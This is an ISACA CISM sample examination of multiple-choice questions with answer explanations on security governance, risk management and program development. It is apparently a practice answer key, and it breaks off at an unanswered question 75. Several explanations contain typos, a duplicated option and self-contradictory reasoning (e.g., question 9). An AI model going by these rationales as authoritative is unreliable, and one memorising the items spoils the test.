ISACA CISM Sample Examination
Exam Questions by Domain Area
Reference to:
daypo.net ----------- Simulado CISM
Domain 1 - Information Security Governance (24%)
1. Which of the following requirements would have the lowest level of priority in information security?
a. Technical
b. Regulatory
c. Privacy
d. Business
Information security priorities may, at times, override technical specifications, which then must be rewritten to conform to minimum security standards. Regulatory and privacy requirements are government-mandated and, therefore, not subject to override. The needs of the business should alwares take precedence in deciding information security priorities.
-----
2. The PRIMARY goal in developing an information security strategy is to:
a. establish security metrics and performance monitoring.
b. educate business process owners regarding their duties.
c. ensure that legal and regulatory requirements are met.
d. support the business objectives of the organization.
The business objectives of the organization supersede all other factors. Establishing metrics and measuring performance, meeting legal and regulatory requirements, and educating business process owners are all subordinate to this overall goal.
-----
3. Senior management commitment and support for information security can BEST be enhanced through:
a. a format security policy sponsored by the chief executive officer (CEO).
b. regular security awareness training for employees.
c. periodic review of alignment with business management goals.
d. senior management sign-off on the information security strategy.
Ensuring that security activities continue to be aligned and support business goals is critical to obtaining their support. Although having the chief executive officer (CEO) sign-off on the security policy and senior management sign-off on the security strategy makes for good visibility and demonstrates good tone at the top, it is a one-time discrete event that may be quickly forgotten by senior management. Security awareness training for employees will not have as much effect on senior management commitment.
-----
4. Which of the following MOST commonly falls within the scope of an information security governance steering committee?
a. Interviewing candidates for information security specialist positions.
b. Developing content for security awareness programs.
c. Prioritizing information security initiatives.
d. Approving access to critical financial systems.
Prioritizing information security initiatives is the only appropriate item. the interviewing of specialists should be performed by the information security manager, while the developing of program content should be performed by the information security staff. Approving access to critical financial systems is the responsibility of individual system data owners.
-----
5. Which of the following is the MOST important factor when designing information security architecture?
a. Technical platform interfaces.
b. Scalability of the network.
c. Development methodologies.
d. Stakeholder requirements.
The most important factor for information security is that it advances the interests of the business, as defined by stakeholder requirements. Interoperability and scalability, as well as development methodologies, are all important but are without merit if a technologically-elegant solution is achieved that does not meet the needs of the business.
-----
6. What will have the HIGHEST impact on standard information security governance models?
a. Number of employees.
b. Distance between physical locations.
c. Complexity of organizations structure.
d. Organizational budget.
Information security governance models are highly dependent on the overall organizational structure. Some of the elements that impact organizational structure are multiple missions and functions across the organization, leadership and lines of communication. Number of employees and distance between physical locations have less impact on information security governance models since well-defined process, technology and people components intermingle to provide the proper governance. Organizational budget is not a major impact once good governance models are in place, hence governance will help in effective management of the organization's budget.
-----
7. In order to highlight to management the importance of integrating information security in the business processes, a newly hired information security officer should FIRST:
a. prepare a security budget.
b. conduct a risk assessment.
c. develop an information security policy.
d. obtain benchmarking information.
Risk assessment, evaluation and impact analysis will be the starting point for driving management's attention to information security. All other choices will follow the risk assessment.
-----
8. An outcome of effective security governance is:
a. business dependency assessment.
b. risk assessment.
c. strategic alignment.
d. planning.
Business dependency assessment is a process of determining the dependency of a business on certain information resources. It is not an outcome or a product of effective security management. Strategic alignment is an outcome of effective security governance. When there is good governance, there is likely to be strategic alignment. Risk assessment is not an outcome of effective security governance; it is a process. Planning comes at the beginning of effective security governance, and is not an outcome but a process.
-----
9. How would an information security manager balance the potentially conflicting requirements of an international organization's security standards and local regulation?
a. Give organization standards preference over local regulations.
b. Follow local regulations only.
c. Make the organization aware of those standards where local regulations causes conflicts.
d. Negotiate a local version of the organization standards.
Adherenace to local regulations must always be the priority. Not following local regulations can prove detrimental to the group organization. Following local regulations only is incorrect since there needs to be some recognition of organization requirements. Making an organization aware of standards is a sensible step, but is not a total solution. Negotiating a local version of the organization standards is the most effective compromise in this situation.
-----
10. Which of the following should drive the risk analysis for an organization?
a. Senior management.
b. Security manager.
c. Quality manager.
d. Legal department.
Although senior management should support and sponsor a risk analysis, the know-how and the management of the project will be with the security department. Quality management and the legal department will contribute to the project.
-----
11. In implementing information security governance, the information security manager is PRIMARILY responsible for:
a. developing the security strategy.
b. reviewing the security strategy.
c. communicating the security strategy.
d. approving the security strategy.
The information security manager is responsible for developing a security strategy based on business objectives with the help of business process owners. Reviewing the security strategy is the responsibility of a steering committee. The information security manager is not necessarily responsible for communicating or approving the security strategy.
-----
12. An information security strategy document that includes specific links to an organization's business activities is PRIMARILY and indicator of:
a. performance measurement.
b. integration.
c. alignment.
d. value delivery.
Strategic alignment of security with business objectives is a key indicator of performance measurement.In guiding a security program, a meaningful performance measurement will also rely on an understanding of business objectives, which will be an outcome of alignment. Business linkages do not by themselves indicate integration or value delivery. While alignment is an important precondition, it is not as important an indicator.
-----
13. To justify the need to invest in a forensic analysis tool, an information security manager should FIRST:
a. review the functionalities and implementation requirements of the solution.
b. review comparison reports of tool implementation in peer companies.
c. provide examples of situations where such a tool would be useful.
d. demonstrate that the investment meets organizational needs.
Any investment must be reviewed to determine whether it is cost effective and supports the organizational strategy. It is important to review the features and functionalities provided by such a tool, and to provide examples of situations where the tool would be useful, but that come after sustantiating the investment and return on investment to the organization.
-----
14. The MOST useful way to describe the objectives in the information security strategy is through:
a. attributes and characteristics of the 'desired state'.
b. overall control objectives of the security program.
c. mapping the IT systems to key business processes.
d. calculation of annual loss expectations.
Security strategy will typically cover a wide variety of issues, processes, technologies and outcomes that can best be described by a set of characteristics and attributes that are desired. Control objectives are developed after strategy and policy development. Mapping IT system to key business processes does not address strategy issues. Calculation of annual loss expectations would not describe the objectives in the information security strategy.
-----
15. Which of the following will have the GREATEST impact on a financial enterprise with offices in various countries are involved in transborder flow of information?
a. Current and future technologies.
b. Evolving data protection regulations.
c. Economizing the costs of network bandwidth.
d. calculation of annual loss expectations.
Information security laws vary from country to country and an enterprise must be aware of and follow the applicable laws from each country. There are regulations from countries mandating the data security requirements, and these generally should be followed wherever the data are flowing between the various offices. The other choices would be considered, but will have less impact compared to regulatory requirements.
-----
16. Strategic alignment is PRIMARILY achieved when services provided by the information security department:
a. closely reflect the requirements of key business stakeholders.
b. closely reflect the desires of the IT executive team.
c. reflect the requirements of industry best practices.
d. are reliable and cost-effective using the latest technologies.
The information security strategic plan should be aligned to the business strategy. Business strategy is the articulation of the desires of the business executive team and the board of directors, who are key stakeholders. IT strategic alignment is achieved when it closely reflects the requirements and desires of these business users. The IT executive team does not necessarily reflect the opinion and requirements of the broader business. Choice C is wrong because industry best practices may not be the right solution for the business. Even if the solution is reliable and cost-effective, if it does not meet the business needs then it is not directed toward business advantage.
-----
17. Who is in the BEST position to implement and monitor a balanced scorecard (BSC) for the information system (IS) security program?
a. Executive management.
b. The chief information security officer (CISO)
c. The director of auditing.
d. The chief information officer (CIO)
An IT BSC demonstrates IT value, facilitates IT governance, and acts as a decision support tool for IT management. The CISO develops, implements and monitors the performance metrics as part of the information security governance framework. It is the role of executive management to provide support to IS management to implement measures to achieve the security objectives. The director of auditing oversees the execution of various audit plans and provides assurance that controls are implemented and operating effectively to support the objectives. The CIO is responsible for the technology governance of the enterprise.
-----
18. Which of the following is the MOST important factor on which to rely to successfully assign cross-organizational responsibility to integrate an information security program?
a. The ease of information security technologies.
b. Open channels of communication.
c. The roles of different job functions.
d. Qualified information security professionals in each department.
Job functions across the organization must be taken into consideration before assigning responsibility withing the information security program. The transparency of information security technologies and processes is important at the end-user level to ensure that information security does not reduce the efficiency of exiting work practices, encouraging work-arounds or other actions that render controls ineffective. Open channels of communication are important, but do not necessarily lead to assigning responsibility for information security control to another person. Having qualified information security professionals in each department will not necessarily translate into a willingness to accept information security responsibility.
-----
19. The security responsibility of data custodians in an organization will include:
a. assuming overall protection of information assets.
b. determining data classification levels.
c. implementing security controls in products they install.
d. ensuring security measures are consistent with policy.
Security responsibilities of data custodians within an organization include ensuring that appropriate security measures are maintained and are consistent with organizational policy. Executive management holds overall responsibility for protection of the information assets. Data owners determine data classification levels for information assets so that so that appropriate levels of controls can be provided to meet the requirement relating to confidentiality, integrity and availability. Implementation of information security in products is the responsibility of the IT developers.
-----
20. Who can BEST approve plans to implement an information security governance framework?
a. Internal auditor.
b. Information security management.
c. Steering committee.
d. Infrastructure management.
Senior management that is part of the security steering committee is in the best position to approve plans to implement an information security governance framework. An internal auditor is secondary to the authority and influence of senior management. Information security management should not have the authority to approve the security governance framework. Infrastructure management will not be in the best position since it focuses more on the technologies than on the business.
-----
21. An organization that has decided to implement a formal information security program should FIRST:
a. invite an external consultant to create the security strategy.
b. allocate budget based on best practices.
c. benchmark similar organizations.
d. define high-level business security requirements.
All four choices are valid steps in the process of implementing a formal information security program; however, defining high-level business security requirements should precede the others because the implementation should be based on those security requirements.
-----
22. Which of the following is a key area of the ISO 27001 framework?
a. Operational risk assessment.
b. Financial crime metrics.
c. Capacity management.
d. Business continuity management.
Operational risk assessment, financial crime metrics and capacity management can complement the information security framework, but only business continuity management is a key component.
-----
23. The MAIN goal of an information security strategic plan is to:
a. develop a risk assessment plan.
b. develop a data protection plan.
c. protect information assets and resources.
d. establish security governance.
The main goal of an information security strategic plan is to protect information assets and resources. Developing a risk assessment plan and a data protection plan, and establishing security governance refer to tools utilized in the security strategic plan that achieve the protection of information assets and resources.
-----
24. Information security policies should:
a. address corporate network vulnerabilities.
b. address the process for communicating a violation.
c. be straightforward and easy to understand.
d. be customized to specific groups and roles.
As high-level statements, information security policies should be straightforward and easy to understand. They are high-level and therefore, do not address network vulnerabilities directly or the process for communicating a violation. As policies, they should provide a uniform message to all groups and user roles.
-----
Domain 2 - Information Risk Management and Compliance (33%)
25. Attackers who exploit cross-site scripting vulnerabilities take advantage of:
a. a lack of proper input validation controls.
b. weak authentication controls in the web application layer.
c. flawed cryptographic secure sockets layer (SSL) implementations and short key lengths.
d. implicit web application trust relationships.
Cross-site scripting attacks inject malformed input. Attackers who exploit weak application authentication controls can gain unauthorized access to applications and this has little to do with cross-site scripting vulnerabilities. Attackers who exploit flowed cryptographic security sockets layer (SSL) implementations and short key lengths can sniff network traffic and crack keys to gain unauthorized access to information. This has little to do with cross-site scripting vulnerabilities. Web application trust relationships do not relate directly to the attack.
-----
26. Which of the following would BEST address the risk of data leakage?
a. File backup procedures.
b. Database integrity checks.
c. Acceptable use policies.
d. Incident response procedures.
Acceptable use policies are the best measure for preventing the unauthorized disclosure of confidential information. The other choices do not address confidentiality of information.
-----
27. A company recently developed a breakthrough technology. Since this technology could give this company a significant competitive edge, which of the following would FIRST govern how this information is to be protected?
a. Access control policy
b. Data classification policy
c. Encryption standards.
d. Acceptable use policy.
Data classification policies define the level of protection to be provided for each category of data. Without this mandated ranking of degree of protection, it is difficult to determine what access controls or levels of encryption should be in place. An acceptable use policy is oriented more toward the end user and, therefore, would not specifically address what controls should be in place to adequately protect information.
-----
28. What is the BEST technique to determine which security controls to implement with a limited budget?
a. Risk analysis
b. Annualized loss expectancy (ALE) calculations.
c. Cost-benefit analysis
d. Impact analysis
Cost-benefit analysis is performed to ensure that the cost of a safeguard does not outweigh it's benefit and that the best safeguard is provided for the cost of implementation. Risk analysis identifies the risks and suggests appropriate mitigation. The annualized loss expectancy (ALE) is subset of a cost-benefit analysis. Impact analysis would indicate how much could be lost if a specific threat occurred.
-----
29. A company's mail server allows anonymous file transfer protocol (FTP) access which could be exploited. What process should the information security manager deploy to determine the necessity for remedial action?
a. A penetration test
b. A security baseline review
c. A risk assessment
d. A business impact analysis (BIA)
A risk assessment will identify the business impact of such vulnerability being exploited and is, thus, the correct process. A penetration test or a security baseline review may identify the vulnerability but not the remedy. A business impact analysis (BIA) will more likely identify the impact of the loss of the mail server.
-----
30. Which of the following measures would be MOST effective against insider threats to confidential information?
a. Role-based access control
b. Audit trail monitoring
c. Privacy policy
d. Defense-in-depth
Role-based access control provides access according to business needs; therefore, it reduces unnecessary access rights and enforces accountability. Audit trail monitoring is a detective control, which is 'after the fact.'. Privacy policy is not relevant to this risk. Defense-in-depth primarily focuses on external threats.
-----
31. Which of the following is the MAIN reason for performing risk assessment on a continuous basis?
a. Justification of the security budget must be continually made.
b. New vulnerabilities are discovered every day.
c. The risk environment is constantly changing.
d. Management needs to be continually informed about emerging risks.
The risk environment is impacted by factors such as changes in technology, and business strategy. These changes introduce new threats and vulnerabilities to the organization. As a result, risk assessment should be performed continuously. Justification of a budget should never be the main reason for performing a risk assessment. New vulnerabilities should be managed through a patch management process. Informing management about emerging risks is important, but is not the main driver for determining when a risk assessment should be performed.
-----
32. There is a time lag between the time when a security vulnerability is first published, and the time when a patch is delivered. Which of the following should be carried out FIRST to mitigate the risk during this time period?
a. Identify the vulnerable systems and apply compensating controls.
b. Minimize the use of vulnerable systems.
c. Communicate the vulnerability to system users.
d. Update the signatures database of the intrusion detection system (IDS)
The best protection is to identify the vulnerable systems and apply compensating controls until a patch is installed. Minimizing the use of vulnerable systems and communicating the vulnerability to system users could be compensating controls but would not be the first course of action. Choice D does not make clear the timing of when the intrusion detection system (IDS) signature list would be updated to accommodate the vulnerabilities that are not yet publicly known. Therefore, this approach should not always be considered as the first option.
-----
33. Which of the following security activities should be implemented in the change management process to identify key vulnerabilities introduced by changes?
a. Business impact analysis (BIA)
b. Penetration testing
c. Audit and review
d. Threat analysis
Penetration testing focuses on identifying vulnerabilities. None of the other choices would identify vulnerabilities introduced by changes.
-----
34. Which of the following techniques MOST clearly indicates whether specific risk-reduction controls should be implemented?
a. Cost-benefit analysis
b. Penetration testing
c. Frequent risk assessment programs
d. Annual loss expectancy (ALE) calculation
In a cost-benefit analysis, the annual cost of safeguards is compared with the expected cost of loss. This can then be used to justify a specific control measure. Penetration testing may indicate the extent of a weakness but, by itself, will not establish the cost/benefit of a control. Frequent risk assessment programs will certainly establish what risk exists but will not determine the maximum cost of controls. Annual loss expectancy (ALE) is a measure which will contribute to the value of the risk but, along, will not justify a control.
-----
35. An organization has decided to implement additional security controls to treat the risks of a new process. This is an example of:
a. eliminating the risk.
b. transferring the risk.
c. mitigating the risk.
d. accepting the risk.
Risk can never be eliminated entirely. Transferring the risk gives it away such as buying insurance so the insurance company can take the risk. Implementing additional controls is an example of mitigating risk. Doing nothing to mitigate the risk would be an example of accepting risk.
-----
36. Which of the following roles is PRIMARILY responsible for determining the information classification levels for a given information asset?
a. Manager
b. Custodian
c. User
d. Owner
Although the information owner may be in a management position and is also considered a user, the information owner role has the responsibility for determining information information classification levels. Management is responsible for higher-level issues such as providing and approving budget, supporting activities, etc. The information custodian is responsible for day-today security tasks such as protecting information, backing up information, etc. Users are the lowest level. They use the data. The owner classifies the data.
-----
37. The PRIMARY reason for assigning classes of sensitivity and criticality to information resource is to provide a basis for:
a. determining the scope for inclusion in an information security program.
b. defining the level of access controls.
c. justifying costs for information resources.
d. determining the overall budget of an information security program.
The assigned class of sensitivity and criticality of the information resource determines the level of access controls to be put in place. The assignment of sensitivity and criticality takes place with the information assets that have already been included in the information security program and has only an indirect bearing on the costs to be incurred. The assignment of sensitivity and criticality contributes to, but does not decide, the overall budget of the information security program.
-----
38. An organization is already certified to an international security standard. Which mechanism would BEST help to further align the organization with other data security regulatory requirements as per new business needs?
a. Key performance indicators (KPIs)
b. Business impact analysis (BIA)
c. Gap analysis
d. Technical vulnerability assessment
Gap analysis would help identify the actual gaps between the desired state and the current implementation of information security management. BIA is primarily used for business continuity planning. Technical vulnerability assessment is used for detailed assessment of technical controls, which would come later in the process and would not provide complete information in order to identify gaps.
-----
39. When performing a qualitative risk analysis, which of the following will BEST produce reliable results?
a. Estimated productivity losses
b. Possible scenarios with threats and impacts
c. Value of information assets
d. Vulnerability assessment
Listing all possible scenarios that could occur, along with threats and impacts, will better frame the range of risks and facilitate a more informed discussion and decision. Estimated productivity losses, value of information assets and vulnerability assessments would not be sufficient on their own.
-----
40. Which of the following is the BEST method to ensure the overall effectiveness of a risk management program?
a. User assessments of changes
b. Comparison of the program results with industry standards.
c. Assignment of risk within the organization
d. Participation by all members of the organization
Effective risk management requires participation, support and acceptance by all applicable members of the organization, beginning with the executive levels. Personnel must understand their responsibilities and be trained on how to fulfill their roles.
-----
41. The MOST effective use of a risk register is to:
a. identify risks and assign roles and responsibilities for mitigation.
b. identify threats and probabilities.
c. facilitate a thorough review of all IT-related risks on a periodic basis.
d. record the annualized financial amount of expected losses due to risks.
A risk register is more than a simple list--it should be used as a tool to ensure comprehensive documentation, periodic review and formal update of all risk elements in the enterprise's IT and related organization. Identifying risk and assigning roles and responsibilities for mitigation are elements of the register. Identifying threats and probabilities are two elements that are defined in the risk matrix, as differentiated from the broader scope of content in, and purpose for, the risk register. While the annualized loss expectancy (ALE) should be included in the register, this quantification is only a single element in the overall risk analysis program.
-----
42. logging is an example of which type of defense against systems compromise?
a. Containment
b. Detection
c. Reaction
d. Recovery
Detection defenses include logging as well as monitoring, measuring, auditing, detecting viruses and intrusion. Examples of containment defenses are awareness, training and physical security defenses. Examples of reaction defenses are incident response, policy and procedure change, and control enhancement. Examples of recovery defenses are backups and restorations, failover and remote sites, and business continuity plans and disaster recovery plans.
-----
43. Which of the following is the MOST implement to keep in mind when assessing the value of information?
a. The potential financial loss
b. The cost of recreating the information
c. The cost of insurance coverage
d. Regulatory requirement
The potential for financial loss is always a key factor when assessing the value of information. Choices B, C and D may be contributors, but not the key factor.
-----
44. When a proposed system change violates an existing security standard, the conflict would be BEST resolved by:
a. calculating the risk
b. enforcing the security standard.
c. redesigning the system change.
d. implementing mitigating controls.
Decisions regarding security should always weigh the potential loss from a risk against the existing controls. Each situation is unique; therefore, it is not advisable to always decide in favor of enforcing a standard. Redesigning the proposed change might not always be the best option because it might not meet the business needs. Implementing additional controls might be an option, but this would be done after the risk is known.
-----
45. The information classification scheme should:
a. consider possible impact of a security breach.
b. classify personal information in electronic form.
c. be performed by the information security manager.
d. classify systems according to the data processed.
Data classification is determined by the business risk, i.e., the potential impact on the business of the loss, corruption or disclosure of information.It must be applied to information in all forms, both electronic and physical (paper), and should be applied by the data owner, not the security manager. Choice B is an incomplete answer because it addresses only privacy issues, while choice A is a more complete response. Systems are not classified per se, but the dta they process and store should definitely by classified.
-----
46. Which of the following is the BEST method to provide a new user with their initial password for e-mail system access?
a. interoffice a system-generated complex password with 30 days expiration.
b. Provide a temporary password over the telephone set for immediate expiration.
c. Require no password but force the user to set their own in 10 days.
d. Set initial password equal to the user ID with expiration in 30 days.
Documenting the password on paper is not the best method even if sent through interoffice mail--if the password is complex and difficult to memorize, the user will likely keep the printed password and this creates a security concern. A temporary password that will need to be changed upon first logon is the best method because it is reset immediately and replaced with the user's choice of password, which will make it easier for the user to remember. If it is given to the wrong person, the legitimate user will likely notify security if still unable to access the system, so the security risk is low. Setting an account with no initial password is a security concern even if it is just for a few days. Choice D provides the greatest security threat because user IDs are typically known by both users and security staff, thus compromising access for up to 30 days.
-----
47. An operating system (OS) noncritical patch to enhance system security cannot be applied because a critical application is not compatible with the change. Which of the following is the BEST solution?
a. Rewrite the application to conform to the upgrade operating system.
b. Compensate for not installing the patch with mitigating controls.
c. Alter the patch to allow the application to run in a privileged state.
d. Run the application on a test platform; turn production to allow patch and application.
Since the operating system (OS) patch will adversely impact a critical application, a mitigating control should be identified that will provide an equivalent level of security. Since the application is critical, the patch should not be applied without regard for the application; business requirements must be considered. Altering the OS patch to allow the application to run in a privileged state may create new security weaknesses. Finally, running a production application on a test platform is not an acceptable alternative since it will mean running a critical production application on a platform not subject to the same level of security controls.
-----
48. Primary direction on the impact o compliance with new regulatory requirements that may lead to major application system changes should be obtained form the:
a. corporate internal auditor.
b. system developers/analysis.
c. key business process owners.
d. corporate legal counsel.
Business process owners are in the best position to understand how new regulatory requirements may affect their systems. legal counsel and infrastructure management, as well as internal auditors, would not be in as good a position to fully understand all ramifications.
-----
49. The IT function has declared that, when putting a new application into production, it is not necessary to update the business impact analysis (BIA) because it does not produce modifications in the business processes. The information security manager should:
a. verify the decision with the business units.
b. check the system's risk analysis.
c. recommend update after postimplementation review.
d. request an audit review.
Verifying the decision with the business units is the correct answer because it is not the IT function's responsibility to decide whether a new application modifies business processes Choice B does not consider the change in the applications. Chooices C and D delay the update.
-----
50. An internal review of a web-based application system finds the ability to gain access to all employees' accounts by changing the employee's ID on the URL used for accessing the account. The vulnerability identified is:
a. broken authentication
b. unvalidated input
c. cross-site scripting
d. structured query language (SQL) injection
the authentication process is broken because, although the session is valid, the application should reauthenticate when the input parameters are changed. The review provided valid employee IDs, and valid input was processed. The problem here is the lack of reauthentication when the input parameters are changed. Cross-site scripting is not the problem in this case since the attack is not transferred to any other user's browser to obtain the output. Structured query language (SQL) injection is not a problem since input is provided as a valid employee ID and no SQL queries are injected to provide the output.
-----
51. What is the MOST cost-effective method of identifying new vendor vulnerabilities?
a. External vulnerability reporting sources
b. Periodic vulnerability assessments performed by consultants
c. Intrusion prevention software
d. Honeypots located in the DMZ
External vulnerability source are going to be the most cost-effective method of identifying these vulnerabilities. The cost involved in choices B and C would be much higher, especially if performed at regular intervals. Honeypots would not identify all vendor vulnerabilities. In addition, honeypots located in the DMZ can create a security risk if the production network is not well protected from traffic from compromised honeypots.
-----
52. Of the following, retention of business records should be PRIMARILY based on:
a. periodic vulnerability assessment.
b. regulatory and legal requirements.
c. device storage capacity and longevity.
d. past litigation.
Retention of business records is a business requirement that must consider regulatory and legal requirements based on geographic location and industry. Choices A and C are important elements for making the decision, but the primary driver is the legal and regulatory requirements that need to be followed by all companies. Record retention may take into consideration past litigation, but it should not be the primary decision factor.
-----
53. Which is the BEST way to measure and prioritize aggregate risk deriving from a chain of linked system vulnerabilities?
a. Vulnerability scans
b. Penetration tests
c. Code reviews
d. Security audits
A penetration test is normally the only security assessment that can like vulnerabilities together by exploiting them sequentially. This gives a good measurement and prioritization of risks. Other security assessments such as vulnerability scans, code reviews and security audits can help give an extensive and thorough risk and vulnerability overview, but will not be able to test or demonstrate the final consequence of having everal vulnerabilities linked together. Penetration testing can give risk a new perspective and prioritize based on the end result of a sequence of security problems.
-----
54. Determining the nature and extent of activities required in developing or improving an information security program often requires assessing the existing security level of various program components. The BEST process to accomplish this task is to perform a(n):
a. impact assessment.
b. vulnerability assessment.
c. gap analysis
d. threat assessment.
A gap analysis is used to determine the current state of security for various program components as compared to the desired state. Once the gaps have been determined, action items to improve various aspects of the program should be prioritized using a risk-based approach. An impact assessment is used to determine potential impact in the event of loss of a resource. Vulnerability is only one aspect to be considered in a security review. A threat assessment would not normally be a part of a security review.
-----
55. The design and implementation of controls and countermeasures must be PRIMARILY focused on:
a. eliminating IT risk.
b. cost-benefit balance
c. resource management
d. the number of assets protected
The balance between cost and benefits should direct controls selection. The focus must include procedural, operational and other risks, in addition to IT risk. Resource management is not directly related to controls. The implementation of controls is based on the impact and risk, not on the number of assets.
-----
56. The PRIMARY purpose of performing an internal attack and penetration test is to identify:
a. weaknesses in network and server security.
b. ways to improve the incident response process.
c. potential attack vectors on the network perimeter.
d. the optimum response to internal hacker attacks.
An internal attack and penetration test are designed to identify weaknesses in network and server security. They do not focus as much on incident response or the network perimeter.
-----
57. An organization has learned of a security breach at another company that utilizes similar technology. The FIRST thing the information security manager should do is:
a. assess the likelihood of incidents from the reported cause.
b. discontinue the use of the vulnerable technology.
c. report to senior management that the organization is not affected.
d. remind staff that no similar security breaches have taken place.
The security manager should first assess the likelihood of a similar incident occurring, based on available information. Discontinuing the use of the vulnerable technology would not necessarily be practical since it would likely be needed to support the business. Reporting to senior management that the organization is not affected due to controls already in place would be premature until the information security manager can first assess the impact of the incident. Until this has been researched, it is not certain that no similar security breaches have taken place.
-----
Domain 3 - Information Security Program Development and Management (25%)
58. An intrusion detection system should be placed:
a. outside the firewall
b. on the firewall server
c. on a screened subnet
d. on the external router
An intrusion detection system (IDS) should be placed on a screened subnet, which is a demilitarized zone (DMZ). Placing it on the internet side of the firewall is not advised because the system will generate alerts on all malicious traffic - even though 99 percent will be stopped by the firewall and never reach the internal network. The same would be true of placing it on the external router, if such a thing were feasible. Since firewalls should be installed on hardened servers with minimal services enabled, it would be inappropriate to install the IDS on the same physical device.
-----
59. The BEST reason for an organization to have two discrete firewalls connected directly to the internet and to the same DMZ would be to:
a. provide in-depth defense
b. separate test and production
c. permit traffic load balancing
d. prevent a denial-of-service attack
Having two entry points, each guarded by a separate firewall, is desirable to permit traffic load balancing. As they both connect ot the internet and to the same demilitarized zone (DMZ), such as arrangement is not practical for separating test from production or preventing a denial-of-service attack.
-----
60. An extranet server should be placed:
a. outside the firewall
b. on the firewall server
c. on a screened subnet
d. on the external router
An external server should be placed on a screened subnet, which is a demilitarized zone (DMZ). Placing it on the internet side of the firewall would leave it defenseless. The same would be true of placing it on the external router, although this would not be possible. Since firewalls should be installed on hardened servers with minimal services enabled, it would be inappropriate to store the extranet on the same physical device.
-----
61. Which of the following is the BEST metric for evaluating the effectiveness of security awareness training? The number of:
a. password resets
b. reported incidents
c. incidents resolved
d. access rule violations
Reported incidents will provide an indicator of the awareness level of staff. An increase in reported incidents could indicate that the staff is paying more attention to security. Password resets and access rule violations may or may not have anything to do with awareness levels. The number of incidents resolved may not correlate to staff awareness.
-----
62. Security monitoring mechanisms should PRIMARILY:
a. focus on business-critical information
b. assist owners to manage control risks
c. focus on detecting network intrusions
d. record all security violations
Security monitoring must focus on business-critical information to remain effectively usable by and credible to business users. Control risk is the possibility that controls would not detect an incident or error condition, and therefore is not a correct answer because monitoring would not directly assist in managing this risk. Network intrusions are not the only focus of monitoring mechanisms; although they should record all security violations, this is not the primary objective.
-----
63. When contracting with an outsourcer to provide security administration, the MOST improtant contractual element is the:
a. right-to-terminate clause
b. limitations of liability
c. service level agreement (SLA)
d. financial penalties clause
Service level agreements (SLAs) provide metrics to which outsourcing firms can be held accountable. This is more important than a limitation on the outsourcing firm's liability, a right-to-terminate clause or a hold-harmless agreement which involves liabilities to third parties.
-----
64. Which of the following is the BEST metric for evaluating the effectiveness of an intrusion detection mechanism?
a. Number of attacks detected
b. Number of successful attacks
c. Ratio of false positives to false negatives
d. Ratio of successful to unsuccessful attacks
The ratio of false positives to false negatives will indicate whether an intrusion detection system (IDS) is properly tuned to minimize the number of false alarms while, at the same time, minimizing the number of omissions. The number of attacks detected, successful attacks or the ratio of successful to unsuccessful attacks would not indicate whether the IDS is properly configured.
-----
65. Which of the following is MOST effective in preventing weaknesses from being introduced into existing production systems?
a. Patch management
b. Change management
c. Security baselines
d. Virus detection
Change management controls the process of introducing changes to systems. This is often the point at which a weakness will be introduced. Patch management involves the correction of software weaknesses and would necessarily follow change management procedures. Security baselines provide minimum recommended settings and do not prevent introduction of control weaknesses. Virus detection is an effective tool but primarily focuses on malicious code from external sources, and only for those applications that are online.
-----
66. Which of the following is MOST effective in preventing security weaknesses in operating systems?
a. Patch management
b. Change management
c. Security baselines
d. Configuration management
Patch management corrects discovered weaknesses by applying a correction (a patch) to the original program code. Change management controls the process of introducing changes to systems. Security baselines provide minimum recommended settings. Configuration management controls the updates to the production environment.
-----
67. Which of the following is the MOST effective solution for preventing internal users from modifying sensitive and classified information?
a. Baseline security standards
b. System access violation logs
c. Role-based access controls
d. Exit routines
Role-based access controls help ensure that users only have access to files and systems appropriate for their job role. Violation logs are detective and do not prevent unauthorized access. Baseline security standards do not prevent unauthorized access. Exit routines are dependent upon appropriate role-based access.
-----
68. Which of the following is generally used to ensure that information transmitted over the internet is authentic and actually transmitted by the named sender?
a. Biometric authentication
b. Embedded steganographic
c. Two-factor authentication
d. Embedded digital signature
Digital signatures ensure that transmitted information can be attributed to the named sender; this provides nonrepudiation. Stenographic techniques are used to hide messages or data within other files. Biometric and two-factor authentication is not generally used to protect internet data transmissions.
-----
69. What is an appropriate frequency for updating operating system (OS) patches on production servers?
a. During scheduled rollouts of new applications
b. According to a fixed security patch management schedule
c. Concurrently with quarterly hardware maintenance
d. Whenever important security patches are released
Patches should be applied whenever important security updates are released. They should not be delayed to coincide with other scheduled rollouts or maintenance. Due to the possibility of creating a system outage, they should not be deployed during critical periods of application activity such as month-end or quarter-end closing.
-----
70. A border router should be placed on which of the follwing?
a. Web server
b. IDS server
c. Screened subnet
d. Domain boundary
A border router should be placed on a (security) domain boundary. Placing it on a web server or screened subnet, which is a demilitarized zone (DMZ) would not provide any protection. Border routers are positioned on the boundary of the network, but do not reside on a server.
-----
71. An e-commerce order fulfillment web server should generally be placed on which of the following?
a. Internal network
b. Demilitarized Zone (DMZ)
c. Database server
d. Domain controller
An e-commerce order fulfillment web server should be placed within a DMZ to protect it and the internal network from external attack. Placing it on the internal network would expose the internal network to potential attack from the internet. Since a database server should reside on the internal network, the same exposure would exist. Domain controllers would not normally share the same physical device as a web server.
-----
72. Secure customer use of an e-commerce application can BASE be accomplished through:
a. data encryption
b. digital signatures
c. strong passwords
d. two-factor authentication
Encryption would be the preferred method of ensuring confidentiality in customer communications with an e-commerce application. Strong passwords, by themselves, would not be sufficient since the data could still be intercepted, while two-factor authentication would be impractical. digital signatures would not provide a secure means of communication. In most business-to-customer (B-to-C) web applications, a digital signature is also not a practical solution.
-----
73. What is the BEST defense against a Structured Query Language (SQL) injection attack?
a. Regularly updated signature files
b. A properly configured firewall
c. An intrusion detection system
d. Strict controls on input fields
Structured Query language (SQL) injection involves the typing of programming command statements within a data entry field on a web page, usually with the intent of fooling the application into thinking that a valid password has been entered in the password entry field. the best defense against such an attack is to have strict edits on what can be typed into a data input field so that programming commands will be rejected. Code reviews should also be conducted to ensure that such edits are in place and that there are no inherent weaknesses in the way the code is written; software is available to test for such weaknesses. All other choices would fail to prevent such an attack.
-----
74. Which of the following is the MOST important consideration when implementing an intrusion detection system (IDS)?
a. Tuning
b. Patching
c. Encryption
d. Packet filtering
If an intrusion detection system (IDS) is not properly tuned it will generate an unacceptable number of false positives and/or fail to sound an alarm when an actual attack is underway. Patching is more related to operating system hardening, while encryption and packet filtering would not be as relevant.
-----
75. Which of the following is the MOST important consideration when securing customer credit card data acquired by a point-of-sale (POS) cash register?
a. Authentication
b. Hardening
c. Encryption
d. Nonrepudiation
